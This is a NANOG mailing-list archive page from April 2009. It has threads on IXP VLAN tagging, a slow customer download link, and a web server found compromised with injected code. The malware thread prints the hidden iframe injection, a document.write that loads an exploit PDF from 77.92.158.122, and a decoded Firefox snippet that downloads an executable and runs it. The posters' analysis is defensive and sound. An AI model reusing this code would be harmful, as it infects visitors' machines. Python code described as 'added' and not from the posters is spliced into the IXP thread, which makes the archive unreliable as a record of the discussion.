average - 80KBs - then it's likely safe to dump them all into a single 
physical port and vlan tag the heck out of it.  

it's those other 20 that demand some special care.


(welcome to "how to grow your presence at an IX and when to leave"-101 :)

--bill



Malicious code just found on web server

2009-04-17 Thread Russell Berg
We just discovered what we suspect is malicious code appended to all index.html 
files on our web server as of the 11:00 central time hour today:
 
src="http://77.92.158.122/webmail/inc/web/index.php";
style="display: none;" height="0" width="0"> 
http://77.92.158.122/webmail/inc/web/index.php";
style="display: none;" height="0" width="0">  

IP address resolves to mail.yaris.com; couldn't find any A/V site references to 
this.

Google search reveals some Chinese sites with references to the URL today, but 
nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
b...@wins.net
715-832-3726





RE: Malicious code just found on web server

2009-04-17 Thread Russell Berg
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

-Original Message-
From: Russell Berg 
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog@nanog.org'
Subject: Malicious code just found on web server

We just discovered what we suspect is malicious code appended to all index.html 
files on our web server as of the 11:00 central time hour today:
 
src="http://77.92.158.122/webmail/inc/web/index.php";
style="display: none;" height="0" width="0"> http://77.92.158.122/webmail/inc/web/index.php";
style="display: none;" height="0" width="0">  

IP address resolves to mail.yaris.com; couldn't find any A/V site references to 
this.

Google search reveals some Chinese sites with references to the URL today, but 
nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
b...@wins.net
715-832-3726





Re: IXP

2009-04-17 Thread Paul Vixie
> Large IXPs have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?

the 300-peer IXP's i've been associated with weren't quite full mesh
in terms of who actually wanted to peer with whom, so, no.



Re: IXP

2009-04-17 Thread Richard A Steenbergen
On Fri, Apr 17, 2009 at 09:00:53PM +0200, Arnold Nipper wrote:
> Large IXPs have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?

Not only that, but when faced with the requirement of making the vlan 
IDs match on both sides of the exchange, most members running layer 3 
switches with global vlan significance are going to hit major layer 8 
hurdles negotiating the available IDs very quickly.

A far better way to implement this is with a web portal brokered virtual
crossconnect system, which provisions MPLS martini pwe or vpls circuits
between members. This eliminates the vlan scaling and clash issues, as
it shifts you from a 12-bit identifier to a 32-bit identifier with vlan
tag handoffs to the clients being arbitrarily mapped as the client
wishes. Such a system has significant advantages over traditional flat
layer 2 switches, in things like security, reliability, flexibility,
scalability (in members, traffic, and number of locations within the
network), and multiservice use (since you can accurately bill with snmp
counters per vlan-ID instead of just guestimating w/sflow).

Of course trying to deploy such a system in the current IX market space 
(especially in the US) has its own unique challenges. :)

-- 
Richard A Steenbergen    http://www.e-gerbil.net/ras
GPG Key ID: 0xF8B12CBC (7535 7F59 8204 ED1F CC1C 53AF 4C41 5ECA F8B1 2CBC)
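The two provisioning schemes argued over in this thread, one 802.1Q tag per peering pair with globally significant VLAN IDs versus a brokered service keyed by a 32-bit pseudowire ID with locally chosen handoff tags, can be modelled in a few lines. This is an added illustration, not code from any IXP or from the posters; the broker classes, the "first free ID" allocation policy and the member names are assumptions made here.

```python
from math import isqrt

VLAN_IDS = frozenset(range(1, 4095))  # usable 802.1Q tags; 0 and 4095 are reserved
PW_ID_SPACE = 2 ** 32                 # 32-bit pseudowire / VPLS service identifier


def pairwise_vlans_needed(members):
    """A full peering mesh with one VLAN per pair needs n(n-1)/2 tags."""
    return members * (members - 1) // 2


def max_full_mesh_members(id_space):
    """Largest member count whose full mesh of pair VLANs fits in id_space IDs."""
    n = (1 + isqrt(1 + 8 * id_space)) // 2   # solve n(n-1)/2 <= id_space
    while pairwise_vlans_needed(n) > id_space:  # guard against rounding
        n -= 1
    return n


class GlobalVlanBroker:
    """Per-pair VLANs on members whose switches give VLAN IDs global
    significance: a crossconnect needs an ID that is free on *both* sides."""

    def __init__(self):
        self.in_use = {}  # member -> set of VLAN IDs already configured there

    def reserve(self, member, ids):
        self.in_use.setdefault(member, set()).update(ids)

    def free_ids(self, a, b):
        return VLAN_IDS - self.in_use.get(a, set()) - self.in_use.get(b, set())

    def connect(self, a, b):
        free = self.free_ids(a, b)
        if not free:
            raise RuntimeError(f"no VLAN ID free on both {a} and {b}")
        vid = min(free)  # assumption: lowest mutually free ID wins
        self.reserve(a, {vid})
        self.reserve(b, {vid})
        return vid


class PseudowireBroker:
    """Brokered alternative: the service is keyed by a 32-bit pseudowire ID and
    each member's handoff tag is locally significant, chosen by that member."""

    def __init__(self):
        self.next_pw = 1
        self.handoffs = {}  # (member, local tag) -> pseudowire ID

    def connect(self, a, tag_a, b, tag_b):
        for member, tag in ((a, tag_a), (b, tag_b)):
            if tag not in VLAN_IDS:
                raise ValueError(f"{member}: tag {tag} is outside the 802.1Q range")
            if (member, tag) in self.handoffs:
                raise ValueError(f"{member}: tag {tag} already used on its port")
        if self.next_pw >= PW_ID_SPACE:
            raise RuntimeError("pseudowire ID space exhausted")
        pw_id, self.next_pw = self.next_pw, self.next_pw + 1
        self.handoffs[(a, tag_a)] = pw_id
        self.handoffs[(b, tag_b)] = pw_id
        return pw_id


if __name__ == "__main__":
    print("pair VLANs for 300 members:", pairwise_vlans_needed(300))
    print("full-mesh members that fit in 802.1Q:", max_full_mesh_members(len(VLAN_IDS)))
    print("full-mesh members that fit in 32 bits:", max_full_mesh_members(PW_ID_SPACE))
```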



downloading speed

2009-04-17 Thread chandrashakher pawar
Dear Group member,

We are a level one ISP. One of my customers is connected to Fast Ethernet.
His link speed is 100,000 kbps. While downloading anything from the net, his
download speed does not go above 200 kbps.
While doing multiple downloads he gets around 200 kbps in every window. But
when he closes all the windows, no change in download speed is observed.

our router is C12KPRP-K4P-M

Please advise what could be the cause?

-- 
Regards

Chandrashakher Pawar
IPNOC
Customer & Services Operations
Tata communication AS6453
mobil + 91 9225633948 + 91 9324509268
learn.chan...@gmail.com


Re: downloading speed

2009-04-17 Thread Nuno Vieira - nfsi telecom
link speed/duplex mismatch?

---
Nuno Vieira
nfsi telecom, lda.

nuno.vie...@nfsi.pt
Tel. (+351) 21 949 2300 - Fax (+351) 21 949 2301
http://www.nfsi.pt/



- "chandrashakher pawar"  wrote:

> Dear Group member,
> 
> We are a level one ISP. One of my customers is connected to Fast
> Ethernet.
> His link speed is 100,000 kbps. While downloading anything from the net, his
> download speed does not go above 200 kbps.
> While doing multiple downloads he gets around 200 kbps in every window.
> But
> when he closes all the windows, no change in download speed is
> observed.
> 
> our router is C12KPRP-K4P-M
> 
> Please advise what could be the cause?
> 
> -- 
> Regards
> 
> Chandrashakher Pawar
> IPNOC
> Customer & Services Operations
> Tata communication AS6453
> mobil + 91 9225633948 + 91 9324509268
> learn.chan...@gmail.com



Re: downloading speed

2009-04-17 Thread Jay Hennigan

chandrashakher pawar wrote:

Dear Group member,

We are a level one ISP. One of my customers is connected to Fast Ethernet.
His link speed is 100,000 kbps. While downloading anything from the net his
downloading speed does not go above 200 kbps.
While doing multiple downloads he gets around 200 kbps in every window. But
when he closes all the windows no change in downloading speed is observed.

our router is C12KPRP-K4P-M

Please advise what could be the cause?


Most likely:  http://www.google.com/search?q=tcp+tuning

Also check for duplex mismatch, cable problems, interface errors, etc.

Also verify that you're comparing the same units, bits vs bytes.

--
Jay Hennigan - CCIE #7880 - Network Engineering - j...@impulse.net
Impulse Internet Service  -  http://www.impulse.net/
Your local telephone and internet company - 805 884-6323 - WB6RDV



Re: downloading speed

2009-04-17 Thread joel . mercado
Bad cable?... What trouble shooting steps have been done?
--Original Message--
From: chandrashakher pawar
To: na...@merit.edu
Subject: downloading speed
Sent: Apr 17, 2009 5:23 PM

Dear Group member,

We are a level one ISP. One of my customers is connected to Fast Ethernet.
His link speed is 100,000 kbps. While downloading anything from the net his
downloading speed does not go above 200 kbps.
While doing multiple downloads he gets around 200 kbps in every window. But
when he closes all the windows no change in downloading speed is observed.

our router is C12KPRP-K4P-M

Please advise what could be the cause?

-- 
Regards

Chandrashakher Pawar
IPNOC
Customer & Services Operations
Tata communication AS6453
mobil + 91 9225633948 + 91 9324509268
learn.chan...@gmail.com


Sent on the Now Network from my Sprint® BlackBerry

Re: IXP - PNI

2009-04-17 Thread Antonio Querubin

On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote:


the vlan tagging idea is a virtualization of the PNI construct.
why use an IX when running 10's/100's/1000's of private network
interconnects will do?


granted, if out of the 120 ASN's at an IX, 100 are exchanging on
average - 80KBs - then its likely safe to dump them all into a single
physical port and vlan tag the heck out of it.

its those other 20 that demand some special care.


The construct also doesn't scale well for multicast traffic exchange if 
there's a significant number of multicast peers even though the traffic 
might be low for individual source ASNs.  On the other hand, if the IXP 
doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't 
matter.


Antonio Querubin
whois:  AQ7-ARIN



Re: IXP - PNI

2009-04-17 Thread Joe Greco
> On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote:
> > the vlan tagging idea is a virtualization of the PNI construct.
> > why use an IX when running 10's/100's/1000's of private network
> > interconnects will do?
> >
> > granted, if out of the 120 ASN's at an IX, 100 are exchanging on
> > average - 80KBs - then its likely safe to dump them all into a single
> > physical port and vlan tag the heck out of it.
> >
> > its those other 20 that demand some special care.
> 
> The construct also doesn't scale well for multicast traffic exchange if 
> there's a significant number of multicast peers even though the traffic 
> might be low for individual source ASNs.  On the other hand, if the IXP 
> doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't 
> matter.

Didn't we go through all this with ATM VC's at the AADS NAP, etc?

... JG
-- 
Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
"We call it the 'one bite at the apple' rule. Give me one chance [and] then I
won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN)
With 24 million small businesses in the US alone, that's way too many apples.



Re: IXP - PNI

2009-04-17 Thread Paul Vixie
> The construct also doesn't scale well for multicast traffic exchange if
> there's a significant number of multicast peers even though the traffic
> might be low for individual source ASNs.  On the other hand, if the IXP
> doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't
> matter.

the people who do massive volumes of multicast in my experience have also
been the ones whose network policies, or unicast traffic volumes, or both,
prevented them from joining CSMA peering fabrics.  CSMA assumes a large
number of small flows, which is not what i see in the multicast market, but
i admit that i'm not as involved as i used to be.




Re: downloading speed

2009-04-17 Thread Scott Weeks


--- learn.chan...@gmail.com wrote:
From: chandrashakher pawar 

We are a level one ISP. One of my customers is connected to Fast Ethernet.
His link speed is 100,000 kbps. While downloading anything from the net his
downloading speed does not go above 200 kbps.
While doing multiple downloads he gets around 200 kbps in every window. But
when he closes all the windows no change in downloading speed is observed.
-


You would need to add more info for any meaningful troubleshooting to occur.  
Do you see errors on the interface?  Clear the counters and watch for a while.

scott



Re: IXP

2009-04-17 Thread Arnold Nipper
On 17.04.2009 23:06 Paul Vixie wrote

>> Large IXP have >300 customers. You would need up to 45k vlan tags,
>> wouldn't you?
> 
> the 300-peer IXP's i've been associated with weren't quite full mesh
> in terms of who actually wanted to peer with whom, so, no.

Much depends on your definition of "quite". Would 30% qualify?



Arnold
-- 
Arnold Nipper / nIPper consulting, Sandhausen, Germany
email: arn...@nipper.de   phone: +49 6224 9259 299
mobile: +49 172 2650958 fax: +49 6224 9259 333





Re: downloading speed

2009-04-17 Thread Paul Wall
On Fri, Apr 17, 2009 at 5:23 PM, chandrashakher pawar
 wrote:
> our router is C12KPRP-K4P-M
>
> Please advise what could be the cause?

Could you perhaps paste the router configuration in your reply? If you
could execute a "wr t" or a "show run", that should provide sufficient
information for the proper troubleshooting to take place.

Thank you.

Paul Wall
(Drive Slow)



Re: IXP

2009-04-17 Thread Paul Vixie
> > the 300-peer IXP's i've been associated with weren't quite full mesh
> > in terms of who actually wanted to peer with whom, so, no.
> 
> Much depends on your definition of "quite". Would 30% qualify?

30% would be an over-the-top success.  has anybody ever run out of 1Q tags
in an IXP context?
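A way to put numbers on the question above, as an added example that is not part of the thread and not taken from any IXP's provisioning system. The 802.1Q VID field is 12 bits; VID 0 and VID 4095 are reserved, which leaves 4094 usable tags on a port. The code below hands one tag to each peering pair, as the per-pair VLAN scheme proposes, and reports when a port runs dry for the member counts and the 30% mesh density quoted in this thread. The allocation order and the AS labels are assumptions for illustration; the second function shows the "split the VID into two peer indices" variant, which caps a port at 64 members.

```python
# Added example, not from any IXP's provisioning system: what one tag per
# peering pair costs on a single 802.1Q port.  The VID field is 12 bits; VID 0
# and 4095 are reserved, which leaves 4094 usable tags per port.  The peer
# counts and the 30% mesh density are the figures tossed around in this
# thread; the allocation order and AS labels are assumptions.
from collections import deque
from itertools import combinations

VID_MIN, VID_MAX = 1, 4094


def pairs_needed(peers, mesh_fraction=1.0):
    """Peering pairs, hence tags, for `peers` members at a given mesh density."""
    return round(peers * (peers - 1) // 2 * mesh_fraction)


class PairVlanAllocator:
    """Hands one VID to each (a, b) peering pair on one port; refuses when empty."""

    def __init__(self, reserved=()):
        self.by_pair = {}
        self.free = deque(v for v in range(VID_MIN, VID_MAX + 1)
                          if v not in set(reserved))

    def allocate(self, a, b):
        if a == b:
            raise ValueError("a peer does not peer with itself")
        key = tuple(sorted((a, b)))          # (a, b) and (b, a) are the same VLAN
        if key in self.by_pair:
            return self.by_pair[key]
        if not self.free:
            raise RuntimeError(f"802.1Q tag space exhausted after {len(self.by_pair)} pairs")
        vid = self.free.popleft()
        self.by_pair[key] = vid
        return vid

    def release(self, a, b):
        vid = self.by_pair.pop(tuple(sorted((a, b))))
        self.free.append(vid)                # reused tags go to the back of the queue


def simulate(peers, mesh_fraction):
    """Provision the first pairs_needed() pairs; return (provisioned, exhausted)."""
    alloc = PairVlanAllocator()
    wanted = pairs_needed(peers, mesh_fraction)
    done = 0
    for a, b in combinations(range(peers), 2):
        if done == wanted:
            break
        try:
            alloc.allocate(f"AS{a}", f"AS{b}")
        except RuntimeError:
            return done, True
        done += 1
    return done, False


def structured_vid(a_idx, b_idx, bits=6):
    """The 'wasteful' split scheme: pack two peer indices into the 12-bit VID.

    With 6 bits each that is at most 64 members per port; requiring a_idx < b_idx
    keeps the result inside 1..4094 (0 and 4095 can never be produced).
    """
    if not (0 <= a_idx < b_idx < (1 << bits)):
        raise ValueError("indices must satisfy 0 <= a < b < 2**bits")
    return (a_idx << bits) | b_idx


if __name__ == "__main__":
    for peers, density in ((120, 0.3), (300, 0.3), (300, 1.0)):
        got, exhausted = simulate(peers, density)
        print(f"{peers} peers at {density:.0%} mesh: need {pairs_needed(peers, density)}, "
              f"provisioned {got}, exhausted={exhausted}")
```

With these assumptions a 120-member exchange at 30% mesh fits comfortably, while 300 members at the same density need about 13,000 tags and exhaust a single port after 4,094 pairs, which is the point at which the discussion moves to per-port tag scopes, Q-in-Q or MPLS pseudowires.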



Re: downloading speed

2009-04-17 Thread Scott Weeks


--- sur...@mauigateway.com wrote:
--- learn.chan...@gmail.com wrote:
From: chandrashakher pawar 

While doing multiple downloads he gets around 200 kbps in every window. But
when he closes all the windows no change in downloading speed is observed.
-

You would need to add more info for any meaningful troubleshooting to occur.  
Do you see errors on the interface?  Clear the counters and watch for a while.
-


My apologies.  I typed too fast.  I didn't absorb this part: "While doing 
multiple download he get aroung 200 kbps in every window."  I assume by 
"window" you mean a web browser.  Does this rate limiting happen with other 
protocols like FTP?

scott





Re: Malicious code just found on web server

2009-04-17 Thread Chris Mills
I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:


That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg  wrote:
> FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
>
> -Original Message-
> From: Russell Berg
> Sent: Friday, April 17, 2009 3:39 PM
> To: 'nanog@nanog.org'
> Subject: Malicious code just found on web server
>
> We just discovered what we suspect is malicious code appended to all 
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0">  src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0">  
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site references 
> to this.
>
> Google search reveals some Chinese sites with references to the URL today, 
> but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> b...@wins.net
> 715-832-3726
>
>
>
>



Re: IXP

2009-04-17 Thread Arnold Nipper
On 18.04.2009 00:04 Paul Vixie wrote

>>> the 300-peer IXP's i've been associated with weren't quite full
>>> mesh in terms of who actually wanted to peer with whom, so, no.
>> 
>> Much depends on your definition of "quite". Would 30% qualify?
> 
> 30% would be an over-the-top success.  has anybody ever run out of 1Q
> tags in an IXP context?

Why? You only need 1 ;-)



Arnold
-- 
Arnold Nipper / nIPper consulting, Sandhausen, Germany
email: arn...@nipper.de   phone: +49 6224 9259 299
mobile: +49 172 2650958 fax: +49 6224 9259 333





Re: downloading speed

2009-04-17 Thread Mike Lewinski

chandrashakher pawar wrote:


We are a level one ISP. One of my customers is connected to Fast Ethernet.
His link speed is 100,000 kbps. While downloading anything from the net his
downloading speed does not go above 200 kbps.
While doing multiple downloads he gets around 200 kbps in every window. But
when he closes all the windows no change in downloading speed is observed.


As others have mentioned, duplex mismatch is a good cause. If you have a 
client with java support, give the NDT a try as this is something it 
claims to detect:


http://ndt.anl.gov:7123/

There's a master site list available here so you may wish to find a 
closer test site:

http://e2epi.internet2.edu/ndt/ndt-server-list.html

Caveat: I think most of them are Internet2 only. I know the ANL and CERN 
sites are accessible to us but didn't try them all.


Mike



Re: IXP - PNI

2009-04-17 Thread bmanning
On Fri, Apr 17, 2009 at 04:52:53PM -0500, Joe Greco wrote:
> > On Fri, 17 Apr 2009, bmann...@vacation.karoshi.com wrote:
> > > the vlan tagging idea is a virtualization of the PNI construct.
> > > why use an IX when running 10's/100's/1000's of private network
> > > interconnects will do?
> > >
> > > granted, if out of the 120 ASN's at an IX, 100 are exchanging on
> > > average - 80KBs - then its likely safe to dump them all into a single
> > > physical port and vlan tag the heck out of it.
> > >
> > > its those other 20 that demand some special care.
> > 
> > The construct also doesn't scale well for multicast traffic exchange if 
> > there's a significant number of multicast peers even though the traffic 
> > might be low for individual source ASNs.  On the other hand, if the IXP 
> > doesn't use IGMP/MLD snooping capable switches, then I suppose it doesn't 
> > matter.
> 
> Didn't we go through all this with ATM VC's at the AADS NAP, etc?
> 
> ... JG

yes indeed.

--bill



Re: Malicious code just found on web server

2009-04-17 Thread Paul Ferguson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills  wrote:

> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
> document.write(" src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|U
> nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> type=\"application/pdf\">");
>
> The 1.2.3.4 in the URL is my public IP address (I changed that).
>
> Below the javascript, it grabs a PDF:
>  style="border:none">
>
> That PDF is on the site, I haven't looked at it yet though.
>

Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6P+Oq1pz9mNUZTMRAgINAJ9nFvTfdP0nNB5IXGCR5U5MKvbBxwCgoZQZ
1dYwVrqBqq9k7RVzAhXtYMY=
=bmbW
-END PGP SIGNATURE-


-- 
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/



Re: downloading speed

2009-04-17 Thread chandrashakher pawar
Configuration

sh run interface FastEthernet1/3/1
Building configuration...
Current configuration : 351 bytes
!
interface FastEthernet1/3/1
 description CUST:xxx
 bandwidth 10
 ip address 116.0.85.13 255.255.255.252
 no ip redirects
 no ip directed-broadcast
 load-interval 30
 negotiation auto
 no cdp enable
end

No errors on the interface.
None of our customers on this router has complained to us about this issue.
I have changed this to "negotiation auto" as suggested by one of our members.
Tomorrow the customer will test again and reply.
Round-trip time is good, no backbone choked.
Units will not make a bit of difference, as the customer tried troubleshooting the
issue after connecting a laptop directly to the 100 Mbps link.
In that case also the result was the same.

Regards
Chandrashakher Pawar
IPNOC
Customer & Services Operations
Tata communication AS6453
mobil + 91 9225633948 + 91 9324509268
learn.chan...@gmail.com







On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks wrote:

>
>
> --- learn.chan...@gmail.com wrote:
> From: chandrashakher pawar 
>
> We are a level one ISP. One of my customers is connected to Fast Ethernet.
> His link speed is 100,000 kbps. While downloading anything from the net his
> downloading speed does not go above 200 kbps.
> While doing multiple downloads he gets around 200 kbps in every window. But
> when he closes all the windows no change in downloading speed is observed.
> -
>
>
> You would need to add more info for any meaningful troubleshooting to
> occur.  Do you see errors on the interface?  Clear the counters and watch
> for a while.
>
> scott
>
>

Re: downloading speed

2009-04-17 Thread Mike Lyon
Have him do a traceroute from his PC or router to where he is trying to
download from. Where is it choking?

On Fri, Apr 17, 2009 at 3:21 PM, chandrashakher pawar <
learn.chan...@gmail.com> wrote:

> Configuration
> 
> sh run interface FastEthernet1/3/1
> Building configuration...
> Current configuration : 351 bytes
> !
> interface FastEthernet1/3/1
>  description CUST:xxx
>  bandwidth 10
>  ip address 116.0.85.13 255.255.255.252
>  no ip redirects
>  no ip directed-broadcast
>  load-interval 30
>  negotiation auto
>  no cdp enable
> end
> 
> No errors on the interface.
> None of our customers on this router has complained to us about this issue.
> I have changed this to "negotiation auto" as suggested by one of our
> members.
> Tomorrow the customer will test again and reply.
> Round-trip time is good, no backbone choked.
> Units will not make a bit of difference, as the customer tried troubleshooting the
> issue after connecting a laptop directly to the 100 Mbps link.
> In that case also the result was the same.
>
> Regards
> Chandrashakher Pawar
> IPNOC
> Customer & Services Operations
> Tata communication AS6453
> mobil + 91 9225633948 + 91 9324509268
> learn.chan...@gmail.com
>
>
>
>
>
>
>
> On Fri, Apr 17, 2009 at 10:57 PM, Scott Weeks  >wrote:
>
> >
> >
> > --- learn.chan...@gmail.com wrote:
> > From: chandrashakher pawar 
> >
> > We are a level one ISP. One of my customers is connected to Fast Ethernet.
> > His link speed is 100,000 kbps. While downloading anything from the net his
> > downloading speed does not go above 200 kbps.
> > While doing multiple downloads he gets around 200 kbps in every window. But
> > when he closes all the windows no change in downloading speed is observed.
> > -
> >
> >
> > You would need to add more info for any meaningful troubleshooting to
> > occur.  Do you see errors on the interface?  Clear the counters and watch
> > for a while.
> >
> > scott
> >
> >
>


Re: Malicious code just found on web server

2009-04-17 Thread Paul Ferguson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson 
wrote:

>
> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills 
> wrote:
>
>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> type=\"application/pdf\">");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> > style="border:none">
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>
>
> Most likely a file that exploits a well-known vulnerability in Adobe
> Reader, which in turn probably loads malware from yet another location.
>
> We've been seeing a lot of this lately.
>

Yes, definitely malicious:

http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
/K0hKsJiAz4RGu8VQkyP+js=
=AzJq
-END PGP SIGNATURE-



-- 
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/



Re: Malicious code just found on web server

2009-04-17 Thread Chris Mills
You beat me to it.

-ChrisAM

On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson 
> wrote:
>
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills 
>> wrote:
>>
>>> I took a quick look at the code... formatted it in a pastebin here:
>>> http://pastebin.com/m7b50be54
>>>
>>> That javascript writes this to the page (URL obscured):
>>> document.write(">> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
>>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>>> type=\"application/pdf\">");
>>>
>>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>>
>>> Below the javascript, it grabs a PDF:
>>> >> style="border:none">
>>>
>>> That PDF is on the site, I haven't looked at it yet though.
>>>
>>
>> Most likely a file that exploits a well-known vulnerability in Adobe
>> Reader, which in turn probably loads malware from yet another location.
>>
>> We've been seeing a lot of this lately.
>>
>
> Yes, definitely malicious:
>
> http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
>
> - - ferg
>
> -BEGIN PGP SIGNATURE-
> Version: PGP Desktop 9.5.3 (Build 5003)
>
> wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> /K0hKsJiAz4RGu8VQkyP+js=
> =AzJq
> -END PGP SIGNATURE-
>
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
>  Engineering Architecture for the Internet
>  fergdawgster(at)gmail.com
>  ferg's tech blog: http://fergdawg.blogspot.com/
>



Re: Malicious code just found on web server

2009-04-17 Thread Jake Mailinglists
Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decode the code attempts multiple attacks to try and get the victim to
download an executable

   hxxp://77.92.158.122/webmail/inc/web/load.php


Virustotal results (3/40)
http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3


Also this code appears to be trying to exploit specific browser types
(Chrome and Mozilla in particular) as can be seen from this code snippet of
the decode.

(Commented out each line just in case someone has a browser that will try
and render this)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, "Function");
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var file=C.classes['@mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initWithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return C.classes['@mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); }")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){ io=C.classes['@mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=io.newURI('http://77.92.158.122/webmail/inc/web/load.php','UTF8',null);persist=C.classes['@mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createInstance(C.interfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file); return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) { process.init(file); process.run(false,[],0); }")();


Also attempts to download a hostile PDF file from a subdirectory underneath
this one which was created with a demo copy of Foxit.
hxxp://77.92.158.122/webmail/inc/web/include/two.pdf

INFO:
Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code I can upload or
update this thread if you are interested in the other attacks.


Jake

On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills  wrote:

> You beat me to it.
>
> -ChrisAM
>
> On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson 
> wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> >
> > On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson 
> > wrote:
> >
> >>
> >> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills 
> >> wrote:
> >>
> >>> I took a quick look at the code... formatted it in a pastebin here:
> >>> http://pastebin.com/m7b50be54
> >>>
> >>> That javascript writes this to the page (URL obscured):
> >>> document.write(" >>> src=\"hXXp://
> 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|
> >>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> >>> type=\"application/pdf\">");
> >>>
> >>> The 1.2.3.4 in the URL is my public IP address (I changed that).
> >>>
> >>> Below the javascript, it grabs a PDF:
> >>>  >>> style="border:none">
> >>>
> >>> That PDF is on the site, I haven't looked at it yet though.
> >>>
> >>
> >> Most likely a file that exploits a well-known vulnerability in Adobe
> >> Reader, which in turn probably loads malware from yet another location.
> >>
> >> We've been seeing a lot of this lately.
> >>
> >
> > Yes, definitely malicious:
> >
